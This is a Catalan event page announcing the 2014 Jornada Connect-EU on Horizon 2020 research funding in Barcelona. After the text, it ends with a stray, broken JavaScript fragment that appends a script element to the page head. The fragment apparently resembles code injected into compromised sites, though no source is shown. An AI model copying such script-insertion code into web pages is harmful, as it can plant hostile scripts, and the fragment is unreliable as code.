Activitats

Jornada Connect-EU

16 de gener de 2014
World Trade Center de Barcelona

ACCIÓ i AGAUR organitzen una nova edició de la Jornada Connect-EU, la jornada de l’R+D Europea a Catalunya.

Properament s’iniciarà l’Horitzó 2020, el nou programa marc d’R+D de la Unió Europea, que oferirà oportunitats a les entitats catalanes per participar en projectes europeus de recerca, desenvolupament i innovació fins al 2020.

A qui s’adreça?

La jornada s’adreça a les empreses, les universitats i els centres de recerca que ja tenen un projecte d’R+D per presentar a l’Horitzó 2020 o que volen iniciar un procés col·laboratiu i d’internacionalització de la recerca, desenvolupament i innovació.

Objectius de la jornada:

• Concentrar en un únic acte les principals sessions d’informació i de sensibilització sobre les possibilitats que ofereix la Unió Europea en matèria d’R+D.
  • Facilitar i potenciar el networking col·laboratiuentre els assistents i amb els representants de la Comissió Europea i del CDTI.
  • Fer difusió dels serveis de la xarxa Enterprise Europe Network: serveis a la petita i mitjana empresa (PIME) d’informació i assessorament en relació a les polítiques i oportunitats de negoci als països de la UE, així com assistència en processos de transferència tecnològica i accés a programes europeus d’R+D+I.

Llegir més sobre l’activitat a la pàgina web jornadaconnecteu.cat

} else {

d.getElementsByTagName(‘head’)[0].appendChild(s);document.currentScript.parentNode.insertBefore(s, document.currentScript);